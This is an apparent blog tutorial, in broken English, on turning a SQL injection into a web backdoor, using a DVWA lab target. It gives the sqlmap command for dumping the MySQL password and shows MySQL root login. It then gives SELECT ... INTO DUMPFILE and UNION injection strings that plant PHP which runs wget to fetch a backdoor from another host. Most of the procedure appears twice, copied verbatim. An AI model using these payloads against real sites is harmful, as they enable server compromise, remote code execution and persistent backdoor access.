Create Backdoor From Sql Injection
To create backdoor from sql injection, the web must be vulnerable with sql injection. then we find the password for mysql database, that can be do with some tecnique, like social enginering or scanning with sqlmap, for exemple :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="Cookie: security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --password
after we got the password, now we enter to mysql with the following sintax:
root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p
then press enter and input the password we got.
now we on my sql shell, and from here we can create database and create backdoor. this sample sintax to download backdoor from other web :
mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --;
Query OK, 1 row affected (0.00 sec)
now we can acces "bad.php" , and after we acces it, the php syntak where in that well be execute and backdoor cn.txt well be uploded in dvwa directori and well be rename with bar.php
finally, we can acces bar.php in http:###.###.###.###/dvwa/bar.php
Other way :
we just insert the sql query to vulnerable form like this :
1' union select 1,"<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/a.php
and where we access the "a.php" file then "wget 192.168.56.1/cn.txt -O bar.php" well be executed and backdoor well be downloaded by server.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="Cookie: security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --password
after we got the password, now we enter to mysql with the following sintax:
root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p
then press enter and input the password we got.
now we on my sql shell, and from here we can create database and create backdoor. this sample sintax to download backdoor from other web :
mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --;
Query OK, 1 row affected (0.00 sec)
now we can acces "bad.php" , and after we acces it, the php syntak where in that well be execute and backdoor cn.txt well be uploded in dvwa directori and well be rename with bar.php
finally, we can acces bar.php in http:###.###.###.###/dvwa/bar.php
we just insert the sql query to vulnerable form like this :
1' union select 1,"<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/a.php
and where we access the "a.php" file then "wget 192.168.56.1/cn.txt -O bar.php" well be executed and backdoor well be downloaded by server.
Comments
Post a Comment